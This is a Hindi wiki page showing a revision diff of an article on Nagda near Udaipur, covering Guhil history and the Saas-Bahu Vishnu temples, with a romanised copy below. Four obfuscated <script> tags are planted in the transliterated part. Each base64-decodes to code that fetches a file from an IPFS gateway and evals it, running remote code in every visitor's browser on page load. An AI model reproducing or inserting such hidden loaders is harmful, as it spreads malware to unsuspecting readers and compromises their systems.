Difference between revisions of "नागदा उदयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
[[चित्र:Nagda-Udaipur.jpg|thumb|250px|नागदा मन्दिर, [[उदयपुर]]<br />Nagda Temple, Udaipur]]
 
[[चित्र:Nagda-Udaipur.jpg|thumb|250px|नागदा मन्दिर, [[उदयपुर]]<br />Nagda Temple, Udaipur]]
[[राजस्थान]], [[उदयपुर]] से 27 किलोमीटर दूरी पर स्थित नागदा एक दर्शनीय स्थान है। यह [[उदयपुर एकलिंगजी|एकलिंगजी]] से कुछ पहले स्थित है। नागदा पहले गुहिल शासकों की प्राचीन राजधानी रह चु्का है। 661 ई. (संवत् 718) का अभिलेख इस स्थान की प्राचीनता को प्रमाणित करता है, यह पुरातात्विक सामग्री की शैली के आधार पर उतना प्राचीन प्रतीत नहीं होता है। यहाँ के प्राचीन स्मारक समय के साथ नष्ट हो गये होंगे। यहाँ से प्राप्त 1026 ई. के एक अभिलेख के अनुसार, गुहिल शासक श्रीधर ने यहाँ के कुछ मंदिरों का निर्माण करवाया था, वर्त्तमान का सास- बहू मंदिर इन्हीं मंदिरों में है। शैलीगत समानता के आधार पर भी ये मंदिर 10वीं और 11 वीं शताब्दी में निर्मित प्रतीत होते हैं। कहा जाता है कि इन मंदिरों की स्थापना सहस्रबाहु नामक राजा के द्वारा करवाई गई थी, लेकिन चूँकि गुहिल वंश के इतिहास में इस नाम से किसी भी शासक की चर्चा नहीं की गई है। अतः यह तर्कसंगत प्रतीत नहीं होता।
+
{{tocright}}
 +
नागदा [[राजस्थान]], [[उदयपुर]] से 27 किलोमीटर दूरी पर स्थित एक दर्शनीय स्थान है। यह [[उदयपुर एकलिंगजी|एकलिंगजी]] से कुछ पहले स्थित है। मेवाड़ के संस्थापक बप्पारावल ने नागदा में ही अपनी राजधानी बनायी थी।1226 ई. में दिल्ली के सुल्तान इल्तुतमिश ने आक्रमण करके इसे नष्ट-भ्रष्ट कर दिया। नागदा में हिन्दू एवं [[जैन मन्दिर|जैन मन्दिरों]] के अनेक स्मारक हैं।
 +
 
 +
==इतिहास==
 +
नागदा पहले गुहिल शासकों की प्राचीन राजधानी रह चु्का है। 661 ई. (संवत् 718) का अभिलेख इस स्थान की प्राचीनता को प्रमाणित करता है, यह पुरातात्विक सामग्री की शैली के आधार पर उतना प्राचीन प्रतीत नहीं होता है। यहाँ के प्राचीन स्मारक समय के साथ नष्ट हो गये होंगे। यहाँ से प्राप्त 1026 ई. के एक [[अभिलेख]] के अनुसार, गुहिल शासक श्रीधर ने यहाँ के कुछ मंदिरों का निर्माण करवाया था, वर्त्तमान का सास- बहू मंदिर इन्हीं मंदिरों में है। शैलीगत समानता के आधार पर भी ये मंदिर 10वीं और 11 वीं [[शताब्दी]] में निर्मित प्रतीत होते हैं। कहा जाता है कि इन मंदिरों की स्थापना सहस्रबाहु नामक राजा के द्वारा करवाई गई थी, लेकिन चूँकि गुहिल वंश के इतिहास में इस नाम से किसी भी शासक की चर्चा नहीं की गई है। अतः यह तर्कसंगत प्रतीत नहीं होता।
 +
 
 +
==प्रसिद्धि==
 +
यहाँ के मन्दिरों के शिल्प में आत्मोत्थान के भाव स्पष्ट प्रतिबिम्बित होते हैं। मूर्तियों में गुप्तकालीन कला की परम्परा और पूर्व मध्यकाल की गति शक्ति और प्रेम के भाव झलकते हैं। यहाँ के मन्दिरों में सास-बहू का मन्दिर सर्वाधिक उल्लेखनीय है। ये [[विष्णु]] को समर्पित है। सास-बहू मन्दिर के कोरित कलात्मक स्तम्भ, गवाक्ष तथा आले सोलंकी परम्परा के उत्तम उदाहरण हैं। ये मंदिर दसवीं शताब्दी के बने हैं। ये दोनों [[श्वेत रंग|श्वेत]] पत्थर के चौकोर चबूतरों पर बने हैं, जो 140 फुट लम्बे हैं। सास के मन्दिर का शिखर ईटों का है। शेष मन्दिर संगमरमर का है। इस मन्दिर के स्तम्भ, उत्कीर्ण शिलापट्ट एवं मूर्तियाँ सभी शिल्प के उत्कृष्ट उदाहरण हैं। मन्दिर के बाहरी भाग में भी सुन्दर मूर्तिकारी प्रदर्शित हैं। सभा मण्डप भी शिल्पकारी से सम्पन्न है। इसकी छत में वृहत् [[कमल|कमल पुष्प]] उकेरा गया है, जिसकी विकसित पंखुड़िया पर चार नर्तकियाँ नृत्यमुद्रा में प्रदर्शित हैं।
 +
 
 +
==दर्शनीय स्थल==
 +
गुहिल शासकों के सूर्यवंशी होने के कारण बागदा के इस मंदिर को [[विष्णु]] जी को समर्पित किया गया है। गर्भगृह के पृष्ठभाग की प्रमुख ताख में एक चतुर्भुज विष्णु प्रतिमा प्रतिष्ठित है। दोनों मंदिरों के बाह्य भाग पर श्रृंगार-रत नर-नारियों का अंकन किया गया है। इस मंदिरों के दायीं ओर के कोने पर एक शक्ति मंदिर निर्मित है, जिस मंदिर में शक्ति के विविध रुपों का अंकन किया गया है। नागदा के पास ही एक मंदिर समूह [[एकलिंग]] या कैलाशपुरी के नाम से जाना जाता है। यहाँ के लकुलीश मंदिर से प्राप्त [[शिलालेख]] 971 ई. का है और यह सर्वाधिक प्राचीन है। अन्य मंदिर 12वीं शताब्दी के हैं।
  
गुहिल शासकों के सूर्यवंशी होने के कारण बागदा के इस मंदिर को [[विष्णु]] जी को समर्पित किया गया है। गर्भगृह के पृष्ठभाग की प्रमुख ताख में एक चतुर्भुज विष्णु प्रतिमा प्रतिष्ठित है। दोनों मंदिरों के बाह्य भाग पर श्रृंगार-रत नर-नारियों का अंकन किया गया है। इस मंदिरों के दायीं ओर के कोने पर एक शक्ति मंदिर निर्मित है, जिस मंदिर में शक्ति के विविध रुपों का अंकन किया गया है।
 
  
नागदा के पास ही एक मंदिर समूह [[एकलिंग]] या कैलाशपुरी के नाम से जाना जाता है। यहाँ के लकुलीश मंदिर से प्राप्त शिलालेख 971 ई. का है और यह सर्वाधिक प्राचीन है। अन्य मंदिर 12वीं शताब्दी के हैं।
 
 
{{प्रचार}}
 
{{प्रचार}}
 
{{लेख प्रगति  
 
{{लेख प्रगति  

Revision as of 05:56, 6 April 2012

[[chitr:Nagda-Udaipur.jpg|thumb|250px|nagada mandir, udayapur
Nagda Temple, Udaipur]]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

nagada rajasthan, udayapur se 27 kilomitar doori par sthit ek darshaniy sthan hai. yah ekaliangaji se kuchh pahale sthit hai. meva d ke sansthapak bapparaval ne nagada mean hi apani rajadhani banayi thi.1226 ee. mean dilli ke sultan iltutamish ne akraman karake ise nasht-bhrasht kar diya. nagada mean hindoo evan jain mandiroan ke anek smarak haian.

itihas

nagada pahale guhil shasakoan ki prachin rajadhani rah chuhka hai. 661 ee. (sanvath 718) ka abhilekh is sthan ki prachinata ko pramanit karata hai, yah puratatvik samagri ki shaili ke adhar par utana prachin pratit nahian hota hai. yahaan ke prachin smarak samay ke sath nasht ho gaye hoange. yahaan se prapt 1026 ee. ke ek abhilekh ke anusar, guhil shasak shridhar ne yahaan ke kuchh mandiroan ka nirman karavaya tha, varttaman ka sas- bahoo mandir inhian mandiroan mean hai. shailigat samanata ke adhar par bhi ye mandir 10vian aur 11 vian shatabdi mean nirmit pratit hote haian. kaha jata hai ki in mandiroan ki sthapana sahasrabahu namak raja ke dvara karavaee gee thi, lekin chooanki guhil vansh ke itihas mean is nam se kisi bhi shasak ki charcha nahian ki gee hai. atah yah tarkasangat pratit nahian hota.

prasiddhi

yahaan ke mandiroan ke shilp mean atmotthan ke bhav spasht pratibimbit hote haian. moortiyoan mean guptakalin kala ki parampara aur poorv madhyakal ki gati shakti aur prem ke bhav jhalakate haian. yahaan ke mandiroan mean sas-bahoo ka mandir sarvadhik ullekhaniy hai. ye vishnu ko samarpit hai. sas-bahoo mandir ke korit kalatmak stambh, gavaksh tatha ale solanki parampara ke uttam udaharan haian. ye mandir dasavian shatabdi ke bane haian. ye donoan shvet patthar ke chaukor chabootaroan par bane haian, jo 140 phut lambe haian. sas ke mandir ka shikhar eetoan ka hai. shesh mandir sangamaramar ka hai. is mandir ke stambh, utkirn shilapatt evan moortiyaan sabhi shilp ke utkrisht udaharan haian. mandir ke bahari bhag mean bhi sundar moortikari pradarshit haian. sabha mandap bhi shilpakari se sampann hai. isaki chhat mean vrihath kamal pushp ukera gaya hai, jisaki vikasit pankhu diya par char nartakiyaan nrityamudra mean pradarshit haian.

darshaniy sthal

guhil shasakoan ke sooryavanshi hone ke karan bagada ke is mandir ko vishnu ji ko samarpit kiya gaya hai. garbhagrih ke prishthabhag ki pramukh takh mean ek chaturbhuj vishnu pratima pratishthit hai. donoan mandiroan ke bahy bhag par shrriangar-rat nar-nariyoan ka aankan kiya gaya hai. is mandiroan ke dayian or ke kone par ek shakti mandir nirmit hai, jis mandir mean shakti ke vividh rupoan ka aankan kiya gaya hai. nagada ke pas hi ek mandir samooh ekaliang ya kailashapuri ke nam se jana jata hai. yahaan ke lakulish mandir se prapt shilalekh 971 ee. ka hai aur yah sarvadhik prachin hai. any mandir 12vian shatabdi ke haian.


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>